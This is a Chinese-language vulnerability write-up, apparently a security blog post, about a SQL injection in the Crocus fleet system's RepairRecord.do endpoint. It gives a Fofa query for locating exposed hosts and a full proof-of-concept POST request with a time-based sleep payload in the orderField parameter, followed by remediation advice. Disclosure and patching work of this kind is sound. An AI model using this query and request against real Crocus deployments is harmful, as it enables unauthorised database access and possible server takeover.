锐明Crocus系统 RepairRecord.do SQL注入漏洞

0x01 产品描述:

明锐技术是一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。该系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,提高企业或车队的运营效率,帮助商用车减少交通事故和货物丢失。通过车载摄像头、毫米波雷达等传感器,Crocus系统能够实现对车辆周围环境的实时感知和监控,显著提升驾驶安全性。此外,利用AI技术,系统能够分析驾驶员的驾驶行为,并及时识别车辆和行人的身份,从而提醒驾驶员注意潜在风险。同时,Crocus系统还具备实时监控货箱状态的能力,包括跟踪货物是否丢失、检查货箱是否关闭等,通过3D检测技术实现更精准的货物识别和管理。

0x02 漏洞描述:

明锐技术的Crocus系统中,RepairRecord.do接口存在SQL注入漏洞,这一漏洞使得经过身份验证的远程攻击者能够利用该接口进行恶意操作。攻击者可以通过SQL注入获取数据库中的敏感信息,例如管理员后台密码和用户个人信息。此外,在某些情况下,攻击者可能获得高权限,甚至能够向服务器写入shell脚本,从而进一步获取服务器的系统权限,导致更严重的安全风险

0x03 搜索语句:

Fofa:body="/ThirdResource/respond/respond.min.js" && title="Crocus"

0x04 漏洞复现:

复制代码
POST /RepairRecord.do?Action=QueryLast HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Token: c3RyZWFtYXgyMDAyMDgxODoxNzI0NjM2OTQyMTA0Ljg4NDU=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: Saffron.U=VUlEPTEmVU49c3RyZWFtYXgyMDAyMDgxOCZHSUQ9MTcyNDYzNjk0MjEwNC44ODQ1MTQmUklEPTEmTT1CTWFwJklOUz0x
Connection: close

EndTime=2024-08-20+00%3A00%3A00&PageIndex=0&PageSize=20&RepairState=-1&StartTime=2024-08-26+00%3A00%3A00&orderField=(select*from(select%0asleep(5))a)&orderType=asc

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限。

建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。

相关推荐
zskj_zhyl3 小时前
毫米波雷达守护银发安全:七彩喜跌倒检测仪重构居家养老防线
人工智能·安全·重构
qq_312920118 小时前
开源入侵防御系统——CrowdSec
安全·开源
饶了我吧,放了我吧9 小时前
计算机网络实验——无线局域网安全实验
计算机网络·安全·web安全
TracyCoder12310 小时前
Apache Shiro 框架详解
安全·apache·shiro·认证·登录
字节跳动安全中心11 小时前
当AI智能体学会“欺骗”,我们如何自保?来自火山的MCP安全答卷
安全·llm·mcp
muyun280012 小时前
安全访问云端内部应用:用frp的stcp功能解决SSH转发的痛点
运维·安全·ssh·frp
橘子洲头13 小时前
Sigma-Aldrich细胞培养基础知识:细胞培养的安全注意事项
其他·安全
自由鬼17 小时前
正向代理服务器Squid:功能、架构、部署与应用深度解析
java·运维·服务器·程序人生·安全·架构·代理
dingzd9518 小时前
了解去中心化金融在现代经济中的作用——安全交易新时代
安全·金融·web3·去中心化·facebook·tiktok·instagram
weixin_4723394619 小时前
网络安全基石:从弱口令治理到动态防御体系的构建
安全·web安全